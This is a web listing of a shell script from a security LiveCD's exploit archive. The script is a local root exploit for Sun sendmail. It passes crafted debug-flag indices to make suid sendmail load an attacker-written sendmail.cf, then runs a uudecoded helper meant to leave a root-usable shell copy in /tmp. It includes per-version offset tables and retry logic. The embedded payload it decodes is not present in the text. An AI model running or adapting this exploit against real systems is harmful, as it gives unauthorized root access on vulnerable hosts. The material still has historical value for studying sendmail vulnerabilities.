home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / sendmail / smdhole.sh < prev    next >
Encoding:
Linux/UNIX/POSIX Shell Script  |  2005-02-12  |  3.9 KB  |  147 lines
  1. #!/bin/sh
  2. # This script takes advantage of sendmail's (mis)interpretation of
  3. # very large unsigned ints as signed ints when accessing the debug
  4. # array.  As it, it will work with the 8 versions of sun sendmail
  5. # that I have access to.  Perhaps I'll update it if I find new
  6. # versions of sun sendmail.
  7. # NOTE:  This is a Sun specific script.  Don't expect it to work with
  8. #        any non-sun sendmail.
  9. # -MRW (atreus)
  10. #
  11. # usage:  smdhole [/path/to/suid/sendmail]
  12. #
  13.  
  14. if [ $1x = x ]; then
  15.         sendmail=/usr/lib/sendmail
  16. else
  17.         echo "Trying to abuse $1."
  18.         sendmail=$1
  19. fi
  20.  
  21. sm_size=`echo \`ls -l $sendmail\` | cut -d" " -f4,5 | sed "s/[^0-9]//g`
  22.  
  23. # prefix and suffix for -1 as unsigned integer.  Actually, this is
  24. # off by two.  you figure out why.
  25. prefix=42949
  26. suffix=67297
  27.  
  28. case $sm_size in
  29.         132064)
  30.                 n1=${prefix}52864
  31.                 n2=${prefix}52865
  32.                 n3=${prefix}52866
  33.                 echo Patched solaris w/o mx.
  34.                 ;;
  35.         134752)
  36.                 n1=${prefix}1656
  37.                 n2=${prefix}1657
  38.                 n3=${prefix}1658
  39.                 echo Patched solaris sendmail.mx
  40.                 ;;
  41.         130860)
  42.                 n1=${prefix}53016
  43.                 n2=${prefix}53017
  44.                 n3=${prefix}53018
  45.                 echo Un-patched solaris w/o mx.
  46.                 ;;
  47.         133548)
  48.                 n1=${prefix}1808
  49.                 n2=${prefix}1809
  50.                 n3=${prefix}1810
  51.                 echo Un-patched solaris sendmail.mx
  52.                 ;;
  53.         139264)
  54.                 n1=${prefix}49609
  55.                 n2=${prefix}49610
  56.                 n3=${prefix}49611
  57.                 echo Sun 4.1.3 sendmail - could be either of two versions
  58.                 n4=${prefix}49265
  59.                 n5=${prefix}49266
  60.                 n6=${prefix}49267
  61.                 ;;
  62.         155648)
  63.                 n1=${prefix}46953
  64.                 n2=${prefix}46954
  65.                 n3=${prefix}46955
  66.                 echo Sun 4.1.3 sendmail.mx - could be either of two versions
  67.                 n4=${prefix}46609
  68.                 n5=${prefix}46610
  69.                 n6=${prefix}46611
  70.                 ;;
  71.         *)
  72.                 echo "I don't know what version of sendmail $sendmail is."
  73.                 echo -n "Look for other versions of sendmail[.mx] on the "
  74.                 echo "system and re-run this as:"
  75.                 echo "     $0 /path/to/another/suid/sendmail"
  76.                 exit 1
  77.                 ;;
  78.         esac
  79.  
  80. cat << EOM > /tmp/sendmail.cf
  81. DMether
  82. DRlocalhost
  83. CRlocalhost
  84. CDMailer-Daemon root daemon uucp
  85. DlFrom \$g  \$d
  86. Do.:%@!^=/[]
  87. Dq\$g\$?x (\$x)\$.
  88. De\$j nothing
  89. OA./aliases
  90. OF0666
  91. Og1
  92. OL0
  93. Oo
  94. OPPostmaster
  95. OQ.
  96. Os
  97. Ou1
  98. T root daemon uucp
  99.  
  100. H?F?From: nobody
  101.  
  102. Mlocal, P=/tmp/fixit, F=flsSDFMmnP, S=10, R=20, A=mail -d \$u
  103. Mprog,  P=/tmp/fixit,   F=lsDFMeuP,  S=10, R=20, A=sh -c \$u
  104.  
  105. S0
  106. R\$+                    \$#local \$:\$1                 just rewrite
  107. EOM
  108.  
  109. cat $0 | sed "s:atreus::" | uudecode
  110. uncompress /tmp/fixit.Z
  111. chmod 755 /tmp/fixit
  112.  
  113. mkdir /tmp/mail
  114. cp /tmp/sendmail.cf /tmp/mail
  115.  
  116. cp /bin/sh /tmp/newsh
  117. chmod 666 /tmp/newsh
  118.  
  119. $sendmail -d${n1}.116,${n2}.109,${n3}.112 `whoami` <<EOF
  120.  
  121. test
  122. EOF
  123.  
  124. if [ -x /tmp/newsh ]; then
  125.         echo "Had the right offset for sendmail.cf.  Here's the result:"
  126. else
  127.         echo "Looks like I had the wrong sendmail.cf offset.  Fuckers."
  128.         if [ ${n4}x = x ]; then
  129.                 echo "This version isn't what I thought it was."
  130.                 echo "Look for other suid sendmails and try this on them."
  131.         else
  132.                 echo "I'm taking another stab with a different offset."
  133. $sendmail -d${n4}.116,${n5}.109,${n6}.112 `whoami` <<EOF
  134.  
  135. test
  136. EOF
  137.                 echo "Here's the result:"
  138.         fi
  139. fi
  140.  
  141. rm /tmp/fixit
  142. rm -r /tmp/mail
  143. rm /tmp/sendmail.cf
  144. ls -l /tmp/newsh
  145.  
  146. exit
  147. #                    www.hack.co.za              [2000]#